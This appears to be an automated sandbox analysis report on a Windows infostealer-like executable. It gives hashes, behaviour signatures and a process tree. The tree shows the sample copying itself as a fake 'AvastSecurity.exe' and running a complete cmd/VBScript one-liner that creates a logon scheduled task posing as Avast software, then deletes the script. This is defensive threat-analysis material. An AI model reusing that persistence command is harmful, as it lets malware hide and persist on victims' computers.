Analysis

  • max time kernel
    28s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/12/2022, 00:52

General

  • Target

    3909df10728e9c01e57850894cf7d087.exe

  • Size

    74KB

  • MD5

    3909df10728e9c01e57850894cf7d087

  • SHA1

    9f1d3633974c6e6251507e92e5801456e30f91d1

  • SHA256

    2062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014

  • SHA512

    9f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d

  • SSDEEP

    1536:lefxEVTPl9cOchE2PySGSn95sSb8U5b543npeufE:l3TPLcOcZ78Sb8U5m3nEu8

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3909df10728e9c01e57850894cf7d087.exe
    "C:\Users\Admin\AppData\Local\Temp\3909df10728e9c01e57850894cf7d087.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1292
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:636
      • C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe
        C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Avast corporation" : regInfo.Description="Avast security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("AvastSecurity", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & cscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & del /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:284
          • C:\Windows\system32\cscript.exe
            cscript //nologo "C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs"
            5⤵
            PID:1380

    Network

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmp1797.vbs

      Filesize

      1KB

      MD5

      d8655cf5570dfb2f06add1fafa516343

      SHA1

      4bc05ddf1577d6a2c32c60c6acb3901ae22acfe1

      SHA256

      a18cde5c98d72f935711a4f0497c376c3360c15580fcd67dc417e7a6b4efd6ef

      SHA512

      4e1451d95274effb47edb8dd04a569b8eb11df23fc0cc02453d26b14bf05bf20117e40145987b4f3500ae48d6e41788e5e5fe0feff0a60165f9060e5f0a4baf3

    • C:\Users\Admin\AppData\Roaming\Identities\AvastSecurity.exe

      Filesize

      74KB

      MD5

      3909df10728e9c01e57850894cf7d087

      SHA1

      9f1d3633974c6e6251507e92e5801456e30f91d1

      SHA256

      2062f480625832da7c3fa81456a73514194c932009b2038eef430cb48eeba014

      SHA512

      9f992ea3a912f8033999b7028d5a9e748362c0d213b28f2d5a88119e220aeb0cb2851e3d880dd09df74df54d96b7a05bafc3f51a1196364a0fc0f6a9d1afa22d

    • memory/1292-54-0x0000000000AE0000-0x0000000000AF8000-memory.dmp

      Filesize

      96KB

    • memory/1292-55-0x000007FEFBFC1000-0x000007FEFBFC3000-memory.dmp

      Filesize

      8KB

    • memory/1996-60-0x0000000000D20000-0x0000000000D38000-memory.dmp

      Filesize

      96KB